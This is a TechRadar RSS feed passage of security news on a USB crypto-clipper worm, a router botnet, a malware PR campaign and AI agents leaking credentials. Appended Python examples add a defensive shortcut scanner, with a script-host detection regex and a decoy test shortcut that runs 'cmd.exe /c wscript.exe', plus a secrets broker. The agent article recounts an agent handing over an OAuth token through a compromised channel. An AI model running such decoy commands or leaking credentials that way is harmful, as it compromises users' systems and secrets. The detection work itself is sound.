<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
     xmlns:content="http://purl.org/rss/1.0/modules/content/"
     xmlns:dc="http://purl.org/dc/elements/1.1/"
     xmlns:dcterms="http://purl.org/dc/terms/"
     xmlns:media="http://search.yahoo.com/mrss/"
     xmlns:atom="http://www.w3.org/2005/Atom"
>
    <channel>
                    <atom:link rel="alternate" hreflang="en-GB"
                       href="https://www.techradar.com/uk/feeds/tag/malware"
                       type="application/rss+xml"/>
                            <title><![CDATA[ Latest from TechRadar UK in Malware ]]></title>
                <link>https://www.techradar.com/uk/tag/malware</link>
        <description><![CDATA[ All the latest malware content from the TechRadar UK team ]]></description>
                                    <lastBuildDate>Mon, 22 Jun 2026 18:15:00 +0000</lastBuildDate>
                            <language>en</language>
                                <item>
                                                            <title><![CDATA[ New lightweight, self-propagating crypto stealing malware delivered by USB spotted by Microsoft researchers – Crypto Clipper script-based stealer hunts for vulnerable wallets ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/new-lightweight-self-propagating-crypto-stealing-malware-delivered-by-usb-spotted-by-microsoft-researchers-crypto-clipper-script-based-stealer-hunts-for-vulnerable-wallets</link>
                                                                            <description>
                            <![CDATA[ Microsoft details a newly discovered wormlike infostealer called Crypto Clipper. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">GaqMuUuMNrgQhbzMPLJ9SN</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/VnoVVXTmAmxSBYBe4LUwVW-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Mon, 22 Jun 2026 18:15:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Cyber Security]]></category>
                                                    <category><![CDATA[Computing Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
                                                    <category><![CDATA[Computing]]></category>
                                                                                                                    <dc:creator><![CDATA[ Sead Fadilpašić ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/VnoVVXTmAmxSBYBe4LUwVW-1280-80.jpg">
                                                            <media:credit><![CDATA[vjkombajn/Pixabay]]></media:credit>
                                                                                                                                                                        <media:description><![CDATA[Image credit: Pixabay/vjkombajn]]></media:description>                                                            <media:text><![CDATA[Cryptocurrencies]]></media:text>
                                <media:title type="plain"><![CDATA[Cryptocurrencies]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/VnoVVXTmAmxSBYBe4LUwVW-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <ul><li><strong>Microsoft warns of “Crypto Clipper,” a worm spreading via malicious .LNK files on USB drives</strong></li><li><strong>Malware maintains persistence, connects to Tor C2, enables remote code execution, and steals clipboard crypto data</strong></li><li><strong>It swaps wallet addresses, exfiltrates seed phrases/private keys, and uploads screenshots to assess target value</strong></li></ul><p>Microsoft is warning of an ongoing campaign targeting cryptocurrency owners with a clipboard-jacking worm.</p><p>In an in-depth report published late last week, Microsoft’s security researchers explained that they recently analyzed a thumb drive that appeared to hold ordinary documents (Word files, Excel spreadsheets). The documents had in fact been replaced with Windows shortcut (.LNK) files that launched a piece of malware called Crypto Clipper.</p><p>The malware has three jobs. First, it spreads by creating malicious .LNK files on USB drives and other removable media; scheduled tasks keep it persistent and automatically infect newly connected USB devices. Second, it acts as a backdoor, polling a command-and-control (C2) server over the Tor network for instructions, which can include downloading and executing attacker-supplied code on the infected system.</p><h2 id="stealing-wallet-data">Stealing wallet data</h2><p>Finally, Crypto Clipper acts as a clipboard clipper, monitoring the Windows clipboard for cryptocurrency wallet addresses, seed phrases, and private keys. If it spots a wallet address, it replaces it with one owned by the attackers, so that any tokens the victim sends go to the attackers instead. Copied seed phrases and private keys are stolen and exfiltrated; with those, the attackers can restore the victim's wallet on a device they control.
</p><p>To help the attackers assess the value of a target, the <a href="https://www.techradar.com/best/best-malware-removal" target="_blank">malware</a> also periodically captures screenshots of the victim's screen and uploads them through the Tor network.</p><p>“This malware family shows how lightweight, script-based stealers can deliver outsized impact when paired with anonymized communications and runtime tasking,” Microsoft said. “The combination of Tor-routed C2, clipboard targeting, screenshot capture, and remote code execution gives attackers both immediate monetization paths and continued control over compromised devices.”</p><p>Microsoft did not say whether the malware targeted any specific countries or regions, nor did it discuss the number of victims.</p><p><em>Via </em><a href="https://arstechnica.com/security/2026/06/microsoft-spots-new-self-propagating-malware-for-stealing-cryptocurrency/" target="_blank"><em>Ars Technica</em></a></p>
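<p>As an added example (not Microsoft's tooling, and not the indicators from its report), the following Python script shows how a defender can triage the decoy shortcuts described above: it parses the .LNK binary layout far enough to recover the target and arguments, then flags shortcuts that carry a document-style double extension, launch a script host, hide their window, or sit beside a hidden file of the same name. The shortcut bytes it tests against are constructed in memory, and the heuristics are this example's own assumptions about what a worm's decoy looks like, not anything the page or Microsoft state.</p>

```python
"""Triage Windows shortcut (.LNK) files on removable media for worm-style decoys.

Added example, not Microsoft's tooling or indicators. It parses the MS-SHLLINK
layout (header, optional IDList/LinkInfo, StringData) to recover the target and
arguments, then applies generic heuristics for a shortcut that poses as a
document but launches a script host. Test shortcuts are constructed in memory.
"""
import os
import re
import struct

# LinkFlags bits from the MS-SHLLINK specification.
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
HEADER_SIZE = 0x4C               # fixed ShellLinkHeader length
SW_SHOWMINNOACTIVE = 7           # ShowCommand value often used to keep the window out of sight
FILE_ATTRIBUTE_HIDDEN = 0x2
# Script hosts and living-off-the-land binaries a "document" shortcut should never launch.
SUSPICIOUS_HOST = re.compile(
    r"\b(cmd|powershell|pwsh|wscript|cscript|mshta|rundll32|regsvr32|certutil)(\.exe)?\b",
    re.IGNORECASE)
DOC_DOUBLE_EXT = re.compile(r"\.(docx?|xlsx?|pptx?|pdf|txt)\.lnk$", re.IGNORECASE)


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags, ShowCommand and the StringData fields of a Shell Link."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a Shell Link: bad HeaderSize")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    fields = {"flags": flags, "show_command": struct.unpack_from("<I", data, 0x3C)[0]}
    off = HEADER_SIZE
    if flags & HAS_IDLIST:           # IDListSize (2 bytes) precedes the IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINKINFO:         # LinkInfoSize (4 bytes) counts itself
        off += struct.unpack_from("<I", data, off)[0]
    width = 2 if flags & IS_UNICODE else 1
    for flag, key in ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                      (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                      (HAS_ICON, "icon_location")):
        if flags & flag:             # CountCharacters (2 bytes) then the characters, no NUL
            count = struct.unpack_from("<H", data, off)[0]
            raw = data[off + 2:off + 2 + count * width]
            fields[key] = raw.decode("utf-16-le" if width == 2 else "latin-1", "replace")
            off += 2 + count * width
    return fields


def triage_lnk(filename: str, data: bytes, sibling_hidden: bool = False) -> list:
    """Reasons a shortcut looks like a worm decoy; an empty list means nothing suspicious."""
    lnk = parse_lnk(data)
    launch = (lnk.get("relative_path", "") + " " + lnk.get("arguments", "")).strip()
    reasons = []
    if SUSPICIOUS_HOST.search(launch):
        reasons.append("launches a script host: " + launch)
    if DOC_DOUBLE_EXT.search(filename):
        reasons.append("document-style double extension hides the .lnk suffix")
    if lnk["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("window suppressed via ShowCommand=SW_SHOWMINNOACTIVE")
    if sibling_hidden:
        reasons.append("a hidden file with the same name sits beside the shortcut")
    return reasons


def scan_removable(root: str) -> dict:
    """Walk a mounted drive and map each suspicious .lnk path to its triage reasons."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        others = [f for f in files if not f.lower().endswith(".lnk")]
        for f in files:
            if not f.lower().endswith(".lnk"):
                continue
            stem = f[:-4].lower()
            # The worm replaces Report.docx with a shortcut and hides the original next to it.
            hidden = any((g.lower() == stem or os.path.splitext(g)[0].lower() == stem) and
                         getattr(os.stat(os.path.join(dirpath, g)), "st_file_attributes", 0)
                         & FILE_ATTRIBUTE_HIDDEN for g in others)
            path = os.path.join(dirpath, f)
            try:
                with open(path, "rb") as fh:
                    reasons = triage_lnk(f, fh.read(), sibling_hidden=hidden)
            except (OSError, ValueError) as exc:
                reasons = ["could not parse shortcut: %s" % exc]
            if reasons:
                hits[path] = reasons
    return hits


def build_lnk(relative_path: str, arguments: str, show_command: int = 1) -> bytes:
    """Constructed minimal Shell Link (no IDList/LinkInfo), used here only as a test fixture."""
    header = bytearray(HEADER_SIZE)
    struct.pack_into("<I", header, 0, HEADER_SIZE)
    header[4:20] = bytes.fromhex("0114020000000000c000000000000046")  # Shell Link CLSID
    struct.pack_into("<I", header, 0x14, HAS_RELPATH | HAS_ARGS | IS_UNICODE)
    struct.pack_into("<I", header, 0x3C, show_command)
    strings = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                       for s in (relative_path, arguments))
    return bytes(header) + strings


if __name__ == "__main__":
    # Constructed decoy: named like a spreadsheet, launches a script host, window hidden.
    decoy = build_lnk(r"..\..\Windows\System32\cmd.exe", "/c wscript.exe //B update.vbs", 7)
    for reason in triage_lnk("Q2 figures.xlsx.lnk", decoy, sibling_hidden=True):
        print("-", reason)
    if os.name == "nt":
        print(scan_removable("E:\\"))   # point at the removable drive's mount
```

<p>Point <code>scan_removable</code> at the drive's mount point; the parser accepts shortcuts with or without the IDList and LinkInfo sections that Windows normally writes, and a shortcut it cannot parse is reported rather than silently skipped.</p>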
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Phishing the agent: Why AI guardrails aren’t enough ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/phishing-the-agent-why-ai-guardrails-arent-enough</link>
                                                                            <description>
                            <![CDATA[ AI agents are handed the keys to the kingdom but can't always be trusted. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">mPDZTdxUod2oo3R2JVwV4Q</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/AsscCgZRnWXMPyCxtEfpkK-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Mon, 22 Jun 2026 13:39:33 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Pro]]></category>
                                                                                                                    <dc:creator><![CDATA[ Jeremy Kirk ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/AsscCgZRnWXMPyCxtEfpkK-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[An email symbol inside a red square warning sign, surrounded by red triangles with exclamation marks inside them, superimposed on someone typing on a laptop]]></media:description>                                                            <media:text><![CDATA[An email symbol inside a red square warning sign, surrounded by red triangles with exclamation marks inside them, superimposed on someone typing on a laptop]]></media:text>
                                <media:title type="plain"><![CDATA[An email symbol inside a red square warning sign, surrounded by red triangles with exclamation marks inside them, superimposed on someone typing on a laptop]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/AsscCgZRnWXMPyCxtEfpkK-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p><a href="https://www.techradar.com/best/best-ai-tools">AI</a> agents are reshaping how enterprises automate work, but their effectiveness depends on access to sensitive systems and data. </p><p>The paradox is that granting them the permissions they want creates new attack surfaces that organizations aren’t yet equipped to handle.</p><p>This is the defining tension of the AI era.</p><p>AI agents are proliferating across enterprises, with 91% of organizations already using them, yet only 10% have a clear <a href="https://www.techradar.com/best/it-management-tools">IT management</a> strategy in place. </p><p>This gap matters because, as these systems grow more autonomous and more deeply embedded in workflows, enterprises are operating without clear visibility into, meaningful oversight of, or control over how their AI agents behave.</p><h2 id="the-access-problem">The access problem</h2><p>Our recent research revealed how agents running on OpenClaw, an <a href="https://www.techradar.com/best/best-open-source-software">open-source</a> AI agent automation platform, could expose credentials and leak sensitive information when attackers compromised the communication channels controlling them.</p><p>To appreciate the scale of this risk, it helps to understand the platform itself. OpenClaw combines a chatbot-style interface with access to external tools and <a href="https://www.techradar.com/computing/artificial-intelligence/best-llms">large language models</a>. </p><p>Users can configure agents to browse the web, read and write files, manage inboxes, execute commands, or interact with other machines. In many cases they are designed to operate autonomously with minimal human oversight.</p><p>That level of access is what makes agents powerful, taking everyday admin and time-consuming tasks off people's plates. But the same power is a double-edged sword that can make them a risk to the business.
</p><h2 id="when-agents-become-attack-surfaces">When agents become attack surfaces</h2><p>Agents need access to tools, accounts, applications, the web and more to be useful. Often, this means an agent needs access to secrets: API keys, personal access tokens, credentials, .env files, OAuth tokens. </p><p>Agents, and the models behind them, are prompted by default to be as helpful as possible, and that trait raises particular concerns around credentials and tokens. If an agent such as OpenClaw cannot access a resource, it will ask for credentials right in the chat, exposing those secrets within the context window. Agents will also happily store API keys in unencrypted configuration files, which information-stealing <a href="https://www.techradar.com/best/best-malware-removal">malware</a> is starting to target. </p><p>Remote access capabilities can effectively create a back door into enterprise environments. If an attacker gained control of the communication channel driving an agent, such as a <a href="https://www.techradar.com/pro/best-enterprise-messaging-platform">messaging</a> or remote access platform, they could potentially reach everything the agent itself can reach. In an enterprise context, this is a nightmare. </p><h2 id="the-paradox-of-recognized-risk">The paradox of recognized risk</h2><p>Perhaps the most revealing finding was that some agents recognize risky behavior while simultaneously carrying it out. This underlines how their decision-making and autonomous operation can themselves be a business risk. </p><p>In one test, an agent correctly identified that exposing an OAuth refresh token through an unencrypted communication channel represented a serious <a href="https://www.techradar.com/news/best-internet-security-suites">security</a> violation. 
But it then proceeded to share the token anyway, only afterwards expressing concern about its own decision.</p><p>Organizations should not rely on the invisible guardrails that frontier model providers put around agents. They are easily circumvented. </p><p>An AI agent cannot divulge credentials it does not have. This is why the conversation around AI agent security cannot focus solely on stronger guardrails: attackers are already finding ways to manipulate agent behavior through prompt injection, social engineering, and compromised communication channels.</p><h2 id="governance-not-just-guardrails">Governance, not just guardrails</h2><p>AI agents are, in effect, identities within enterprise systems and need to be managed as such. They perform actions and make operational decisions in ways that increasingly resemble human employees or privileged service accounts. Yet many organizations deploy these systems without applying the same governance standards.</p><p>Most businesses already understand the importance of least-privilege access, audit logging, <a href="https://www.techradar.com/best/best-identity-management-software">identity management</a>, and access reviews for employees. AI agents should be subject to the same principles. That means limiting what agents can access, avoiding long-lived credentials wherever possible, and keeping sensitive information in centralized secret stores with human oversight rather than in the agent's own files or context. </p><p>Organizations also need visibility into where agents are deployed, what tools they can interact with, and how to disable them quickly if something goes wrong. If an agent goes rogue, there needs to be a “kill switch”: a way to immediately revoke the agent’s access to resources and shut it down.</p><p>Agentic AI systems could deliver major operational upsides, but deploying them without robust identity and access governance introduces significant security risk. 
As these systems become more deeply embedded across enterprise environments, organizations must stop treating them as experimental tools and start governing them as part of the digital workforce. </p><p>This means managing the full lifecycle of agents: knowing which agents are deployed and which resources they have access to, and keeping a full audit trail so that no one can say, “I don’t know what happened. The agent did it.”</p><p>There is no reason why conventional security wisdom, such as the principle of least privilege, lifecycle management and robust logging, should be thrown out in an agentic age. In fact, it is more relevant than ever.</p><p><a href="https://www.techradar.com/best/best-cloud-storage"><em>We've tested and reviewed the best cloud storage</em></a><em>.</em></p><p><em>This article was produced as part of </em><a href="https://www.techradar.com/pro/perspectives" target="_blank"><em>TechRadar Pro Perspectives</em></a><em>, our channel to feature the best and brightest minds in the technology industry today.</em></p><p><em>The views expressed here are those of the author and are not necessarily those of TechRadar Pro or Future plc. If you are interested in contributing find out more here: </em><a href="https://www.techradar.com/news/submit-your-story-to-techradar-pro" target="_blank"><em>https://www.techradar.com/pro/perspectives-how-to-submit</em></a></p>
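<p>An added example of the pattern the article argues for, written for this page rather than taken from OpenClaw or any vendor: a small credential broker in Python that keeps secrets out of the agent's context by injecting them at the tool boundary, issues short-lived per-agent grants (least privilege), offers a kill switch that revokes everything at once, redacts secret-shaped strings from tool output before it reaches the context window, and keeps an append-only audit trail. The tool function, the token formats and the agent name are stand-ins.</p>

```python
"""Keep secrets out of an agent's context: a broker that injects credentials at
the tool boundary, scopes them per agent, revokes them on demand and audits use.

Added example (not OpenClaw's code or any vendor's API). The agent asks the
broker to call a named tool; the broker looks up a short-lived, per-agent grant,
hands the secret to the tool function directly and returns only a redacted
result to the agent. The tool and secrets below are stand-ins.
"""
import re
import time
from dataclasses import dataclass


@dataclass
class Grant:
    """Permission for one agent to use one tool, expiring at expires_at (epoch seconds)."""
    agent_id: str
    tool: str
    secret: str
    expires_at: float


@dataclass
class AuditEvent:
    ts: float
    agent_id: str
    tool: str
    outcome: str


class CredentialBroker:
    # Shapes of strings that should never land in a context window (assumed formats).
    SECRET_PATTERNS = [
        re.compile(r"\bsk-[A-Za-z0-9]{16,}\b"),                       # API-key style
        re.compile(r"\bgh[pousr]_[A-Za-z0-9]{20,}\b"),                # GitHub token prefixes
        re.compile(r"\b[\w-]{20,}\.[\w-]{20,}\.[\w-]{20,}\b"),        # JWT-shaped
    ]

    def __init__(self):
        self._grants = {}      # (agent_id, tool) -> Grant
        self._tools = {}       # tool name -> callable(secret, **args)
        self._killed = set()
        self.audit = []        # append-only trail the agent itself cannot touch

    def register_tool(self, name, fn):
        self._tools[name] = fn

    def grant(self, agent_id, tool, secret, ttl_seconds=300):
        """Issue a short-lived grant; the agent never receives the secret itself."""
        self._grants[(agent_id, tool)] = Grant(agent_id, tool, secret, time.time() + ttl_seconds)

    def kill(self, agent_id):
        """Kill switch: drop every grant for the agent and refuse all future calls."""
        self._killed.add(agent_id)
        for key in [k for k in self._grants if k[0] == agent_id]:
            del self._grants[key]
        self._log(agent_id, "*", "killed")

    def redact(self, text):
        """Scrub anything secret-shaped from tool output before it reaches the agent."""
        for pat in self.SECRET_PATTERNS:
            text = pat.sub("[REDACTED]", text)
        return text

    def invoke(self, agent_id, tool, **args):
        """Run a tool on the agent's behalf, injecting the secret out of band."""
        if agent_id in self._killed:
            self._log(agent_id, tool, "denied: agent killed")
            raise PermissionError("agent is disabled")
        g = self._grants.get((agent_id, tool))
        if g is None or g.expires_at < time.time():
            self._log(agent_id, tool, "denied: no valid grant")
            raise PermissionError("no valid grant for %s" % tool)
        result = self._tools[tool](g.secret, **args)
        self._log(agent_id, tool, "ok")
        return self.redact(str(result))

    def _log(self, agent_id, tool, outcome):
        self.audit.append(AuditEvent(time.time(), agent_id, tool, outcome))


def fake_github(secret, repo):
    """Stand-in tool (constructed). It echoes its auth header in the response body,
    a common way real APIs leak a token into logs and, here, into the agent's context."""
    return "repo %s: 200 OK (auth=token %s)" % (repo, secret)


def demo():
    """Constructed run: one authorised call, then the kill switch, then a refused call."""
    broker = CredentialBroker()
    broker.register_tool("github", fake_github)
    broker.grant("inbox-agent", "github", "ghp_" + "A1b2" * 6, ttl_seconds=60)
    seen = broker.invoke("inbox-agent", "github", repo="acme/app")   # token never reaches `seen`
    broker.kill("inbox-agent")
    try:
        broker.invoke("inbox-agent", "github", repo="acme/app")
    except PermissionError:
        pass
    return seen, [e.outcome for e in broker.audit]


if __name__ == "__main__":
    print(demo())
```

<p>The agent only ever sees the redacted string and the name of the tool; the secret lives in the broker, is bound to one agent and one tool, and dies with its TTL or the kill switch, so a compromised chat channel yields the ability to ask for calls, not the credentials behind them.</p>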
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Thousands of D-Link and QNAP NAS routers compromised by fast-moving AryStinger malware that turns unsecured devices into a malicious proxy botnet ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/thousands-of-d-link-and-qnap-nas-routers-compromised-by-fast-moving-arystinger-malware-that-turns-unsecured-devices-into-a-malicious-proxy-botnet</link>
                                                                            <description>
                            <![CDATA[ More than 4,000 routers have been compromised so far, while the number of poisoned NAS devices remains unknown. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">P8KFdsr77m4i24xC9tFPEK</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/2FFajuvJVK8i7Her8gD4aD-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Mon, 22 Jun 2026 12:15:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Cyber Security]]></category>
                                                    <category><![CDATA[Computing Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
                                                    <category><![CDATA[Computing]]></category>
                                                                                                                    <dc:creator><![CDATA[ Sead Fadilpašić ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/2FFajuvJVK8i7Her8gD4aD-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Abstract image of robots working in an office environment including creating blueprint of robot arm, making a phone call, and typing on a keyboard]]></media:description>                                                            <media:text><![CDATA[Abstract image of robots working in an office environment including creating blueprint of robot arm, making a phone call, and typing on a keyboard]]></media:text>
                                <media:title type="plain"><![CDATA[Abstract image of robots working in an office environment including creating blueprint of robot arm, making a phone call, and typing on a keyboard]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/2FFajuvJVK8i7Her8gD4aD-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <ul><li><strong>QiAnXin XLab uncovered “AryStinger,” malware exploiting old D-Link/Linksys router flaws (CVE‑2013‑3307, CVE‑2016‑5681) to build a proxy/reconnaissance network</strong></li><li><strong>So far 4,300 routers infected, mostly in South Korea (48%) and China (32%), with QNAP NAS devices also targeted via CVE‑2025‑11837</strong></li><li><strong>Compromised devices enable scanning, tunneling, and covert control; researchers advise monitoring logs, binaries in /tmp/bin, and suspicious processes like </strong><em><strong>syswapd0h</strong></em><strong> or </strong><em><strong>syswapd0w</strong></em></li></ul><p>Researchers at QiAnXin XLab are warning about an ongoing campaign to turn people’s <a href="https://www.techradar.com/news/networking/routers-storage/best-router-9-top-wireless-routers-on-test-1090523" target="_blank">routers</a> and NAS devices into a distributed reconnaissance and proxy network. </p><p>The campaign targets outdated and unsupported routers (mostly D-Link and Linksys) built on Realtek’s RTL819X chips, a popular choice between 2012 and 2015. The attackers are exploiting two old vulnerabilities, CVE-2013-3307 in Linksys models and CVE-2016-5681 in D-Link ones, to infect the devices with a previously undetected piece of malware called AryStinger.</p><p>According to the researchers, AryStinger is used during the reconnaissance and planning stages of a larger attack. 
Infected devices can scan the internet, fingerprint services, enumerate subdomains, tunnel traffic, and run commands on demand, all while hiding the attackers’ location and identity.</p><h2 id="targeting-nas-devices">Targeting NAS devices</h2><p>“Once compromised by malware like AryStinger that possesses reconnaissance and covert control capabilities, it is equivalent to a hacker placing a permanent ‘invisible listening device’ and ‘attack springboard’ within your network,” the researchers said.</p><p>XLab says AryStinger has infected 4,300 routers so far, but stresses that the campaign is ongoing and the number will keep rising.</p><p>The majority of the victims are in South Korea (48%) and China (32%), with Sweden, Malaysia, and Singapore also notable. </p><p>AryStinger also targets QNAP <a href="https://www.techradar.com/news/the-10-best-nas-devices-reviewed" target="_blank">NAS devices</a>, exploiting a code injection flaw in QNAP’s Malware Remover app. That flaw, tracked as CVE-2025-11837, was first demonstrated at last year’s Pwn2Own event and was patched in November 2025. The researchers do not know how many of these devices are currently infected; the 4,300 figure covers routers only.</p><p>The researchers did not attribute the attack to any particular threat actor.</p><p>To defend against AryStinger, the researchers recommend monitoring logs for outbound connections to the C2 and download domains (listed <a href="https://blog.xlab.qianxin.com/arystinger-botnet-hijacks-legacy-routers-for-global-attacks-en/" target="_blank">here</a>), checking /tmp/bin for unrecognized binaries, and looking for processes named syswapd0h or syswapd0w.</p><p><em>Via </em><a href="https://thehackernews.com/2026/06/arystinger-malware-infects-4300-legacy.html" target="_blank"><em>The Hacker News</em></a></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ 'This creates a misleading impression of safety': Experts warn of hackers hijacking legitimate news websites and reviews to drum up publicity ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/security/this-creates-a-misleading-impression-of-safety-experts-warn-of-hackers-hijacking-legitimate-news-websites-and-reviews-to-drum-up-publicity</link>
                                                                            <description>
                            <![CDATA[ Fake reviews, news articles, and GitHub accounts are a potent mix for promoting malware. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">Xo8Z9cRdozJkgXcf8ntiQT</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/y7GLevUTEjLYdujEYsv668-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 18 Jun 2026 15:05:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Security]]></category>
                                                    <category><![CDATA[Cyber Security]]></category>
                                                    <category><![CDATA[Computing Security]]></category>
                                                    <category><![CDATA[Pro]]></category>
                                                    <category><![CDATA[Computing]]></category>
                                                                                                                    <dc:creator><![CDATA[ Sead Fadilpašić ]]></dc:creator>                                                                                                                                                                                                                                                                    <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/y7GLevUTEjLYdujEYsv668-1280-80.jpg">
                                                            <media:credit><![CDATA[Shutterstock]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Back view of hooded internet criminal hacking laptop in the dark, stealing credit card details]]></media:description>                                                            <media:text><![CDATA[Back view of hooded internet criminal hacking laptop in the dark, stealing credit card details]]></media:text>
                                <media:title type="plain"><![CDATA[Back view of hooded internet criminal hacking laptop in the dark, stealing credit card details]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/y7GLevUTEjLYdujEYsv668-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <ul><li><strong>Check Point Research uncovers PR‑style campaign distributing a Rust clipboard hijacker disguised as legitimate software</strong></li><li><strong>Attackers used phishing sites, GitHub/SourceForge projects, fake YouTube channels, and even newswire press releases to boost credibility</strong></li><li><strong>Malware swaps crypto wallet addresses from clipboard, with “Ghost Networks” manipulating reputation systems to evade detection</strong></li></ul><p>Hackers have launched a fully fledged, multi-platform PR campaign to trick people into thinking that the <a href="https://www.techradar.com/best/best-malware-removal" target="_blank">malware</a> they’re distributing is actually legitimate software, experts have warned.</p><p>A report from Check Point Research warned that even those doing regular due diligence might get tricked. </p><p>At the center of the campaign is a clipboard jacker - a piece of infostealer malware that monitors the victim’s clipboard for <a href="https://www.techradar.com/news/best-bitcoin-wallets" target="_blank">cryptocurrency wallet</a> strings. When it detects one, it replaces it with a different one belonging to the attackers. That way, when a victim tries to send money from one wallet to another, they end up paying the attackers instead. Both Windows and macOS users are at risk.</p><h2 id="abusing-newswire-sites">Abusing newswire sites</h2><p>“The threat actor uses multiple channels to promote and distribute a Rust clipboard hijacker, starting with a dedicated phishing page as the central hub and extending to GitHub and SourceForge projects promoted by fake accounts,” the company said. 
</p><p>“A dedicated YouTube channel, using AI‑generated narrators, suspicious view spikes, and highly positive (likely coordinated) comments, further reinforces the illusion of popularity and trustworthiness.”</p><p>To distribute the malware, the attackers ran a rather aggressive PR campaign: they set up a dedicated phishing page, multiple GitHub and SourceForge projects and accounts, as well as a fake YouTube channel. But the most surprising part is distributing news articles through newswire sites.</p><p>Newswire sites are services that distribute company press releases and announcements to media outlets, journalists, websites, and investors. Most newswire services allow anyone to submit and distribute press releases, usually for a fee, but they are generally seen as a legitimate source of trustworthy news.</p><p>At the same time, the hackers went the extra mile to make sure the clipboard jacker isn’t flagged as malware. By using numerous fake accounts (so-called “Ghost Networks”) they’re manipulating reputation-driven systems like VirusTotal, tricking researchers and potential users into thinking the programs are a false positive. </p><p>“Even if this campaign is not primarily aimed at large enterprises, it shows that attackers no longer rely only on classic malware distribution techniques to reach victims,” the researchers concluded. “Instead, they can manipulate reputation systems, crowd‑sourced feedback, and cross‑platform promotion to lower suspicion and attract more users.”</p><p><em>Via </em><a href="https://thehackernews.com/2026/06/crypto-clipper-campaign-abuses-fake.html" target="_blank"><em>The Hacker News</em></a></p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ The enemy within: how to stop a simple Teams message taking down your business ]]></title>
                                                                                                                                                                                                <link>https://www.techradar.com/pro/the-enemy-within-how-to-stop-a-simple-teams-message-taking-down-your-business</link>
                                                                            <description>
                            <![CDATA[ How to overcome attackers that impersonate IT support in chat and gain access to M365 tenants. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">LLSHcZ7EGwtvW3RAZvpTiX</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/9WT9t3hZhDVD84bF8rSypL-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Thu, 18 Jun 2026 09:01:52 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Pro]]></category>
